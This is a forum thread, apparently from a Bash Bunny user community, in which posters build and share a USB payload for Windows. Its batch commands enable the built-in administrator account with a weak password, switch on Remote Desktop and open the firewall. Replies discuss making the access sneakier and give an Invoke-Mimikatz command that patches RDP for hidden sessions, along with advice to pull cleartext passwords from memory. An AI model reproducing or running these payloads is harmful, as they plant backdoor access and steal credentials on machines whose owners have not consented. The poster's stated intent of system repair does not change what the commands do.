Vert Posted May 14, 2017 Share Posted May 14, 2017 (edited) the idea is the enable the admin account and rdp and open the ports required so far i have come up with this. batch file this following script net user administrator /active:yes net user administrator reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f sc config TermService start= auto net start Termservice netsh firewall set service RemoteDesktop enable netsh advfirewall firewall set rule group="remote desktop" new enable=Yes exit then compile it as a exe so it can be run as admin from the bunny. ive also made a script to disable everything also. net user administrator /active:no reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f sc config TermService start= auto netsh stop Termservice netsh firewall set service RemoteDesktop disable netsh advfirewall firewall set rule group="remote desktop" new enable=no exit i would note that this is just an idea and completely untested the final step would simply having the bunny run the exe files. i was also thinking it would be a good idea to dump the systems internal and external IP for later use. maybe someone wants to step in and complete this half finished payload or add to it. Edited May 14, 2017 by Vert update Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 14, 2017 Share Posted May 14, 2017 ... Stole my idea. Well, mostly-ish. My idea was to use powershell to enable RDP and then host a hotspot, so you could access the PC from away the PC and control it remotely. Be nice to be able to control it without a user (if there is one) seeing (separate user being used in the background that you can't see). Quote Link to comment Share on other sites More sharing options...
Vert Posted May 14, 2017 Author Share Posted May 14, 2017 (edited) I'm in the later stages of testing the payload now as is it enables the admin account puts a password of 1234 on it and enables rdp script to enable and disable it all I'm in the last stage of getting the payload to run as admin. #RDPADMIN disable.bat enable.bat ------------------------------------------------------------------------------------- #ADMINENABLE figured id add another bat this one simply enables the admin account with password 1234 switch yes to no to disable again. admin.bat -------------------------------------------------------------------------------------- Edited May 14, 2017 by Vert update Quote Link to comment Share on other sites More sharing options...
Vert Posted May 14, 2017 Author Share Posted May 14, 2017 (edited) Presenting 3 new bunny payloads: Admin:enables admin account with password 1234 Adminrdp:enables admin with pass 1234 & RDP + Ports UNadminrdp:disables admin account & RDP + Ports UNadminrdp.rar Adminrdp.rar Admin.rar I take no credit for these i only mashed it all together and tested it. my intended use for these was purely for making system repairs easier and take no responsibility for how they may be used. Edited May 14, 2017 by Vert Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 14, 2017 Share Posted May 14, 2017 39 minutes ago, Vert said: Presenting 3 new bunny payloads: Admin:enables admin account with password 1234 Adminrdp:enables admin with pass 1234 & RDP + Ports UNadminrdp:disables admin account & RDP + Ports UNadminrdp.rar Adminrdp.rar Admin.rar I take no credit for these i only mashed it all together and tested it. my intended use for these was purely for making system repairs easier and take no responsibility for how they may be used. I'll take a look at this. :) Quote Link to comment Share on other sites More sharing options...
Vert Posted May 14, 2017 Author Share Posted May 14, 2017 (edited) The bat files posted above are the exact same as the compiled .exes in the final result so if you would rather compile the bats your self your welcome to do so. It might even be possible to use the bat files rather then the .exes with some changes to the payload but i did not test any of the payloads in this way. Edited May 14, 2017 by Vert Quote Link to comment Share on other sites More sharing options...
rottingsun Posted May 14, 2017 Share Posted May 14, 2017 I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent. Quote Link to comment Share on other sites More sharing options...
Vert Posted May 14, 2017 Author Share Posted May 14, 2017 (edited) when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs. my testing was performed on 2 windows 10 pro systems but i did add some older commands that should work with older versions of windows as far back as xp they remain untested. Edited May 14, 2017 by Vert Quote Link to comment Share on other sites More sharing options...
rottingsun Posted May 14, 2017 Share Posted May 14, 2017 4 minutes ago, Vert said: when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses.  I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked. Quote Link to comment Share on other sites More sharing options...
Vert Posted May 14, 2017 Author Share Posted May 14, 2017 (edited) the bunny is just automation tool it isn't good nor evil by it self its how you use it much like a hammer most use it for putting in nails but others have been known to cave in skulls with it the person using a tool is its master the tool is useless with out you to control it. Edited May 14, 2017 by Vert Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 14, 2017 Share Posted May 14, 2017 You could potentially put third-party remote-desktop software on the PC and then tell the PC to run it in the background, then you can connect to it via a phone or laptop elsewhere (via the PC's hotspot or over the internet) using an app on your side. Quote Link to comment Share on other sites More sharing options...
redteamwynns Posted May 15, 2017 Share Posted May 15, 2017 3 hours ago, Vert said: when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs. my testing was performed on 2 windows 10 pro systems but i did add some older commands that should work with older versions of windows as far back as xp they remain untested. Vert, Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar. Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit' Quote Link to comment Share on other sites More sharing options...
Vert Posted May 15, 2017 Author Share Posted May 15, 2017 (edited) 3 minutes ago, redteamwynns said: Vert, Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar. Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit' sounds interesting and i welcome others to improve on what i started it seems like a good jumping off point / proof of concept. Edited May 15, 2017 by Vert Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 15, 2017 Share Posted May 15, 2017 1 hour ago, redteamwynns said: Vert, Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar. Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit' It does sound interesting. I'll look into that. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.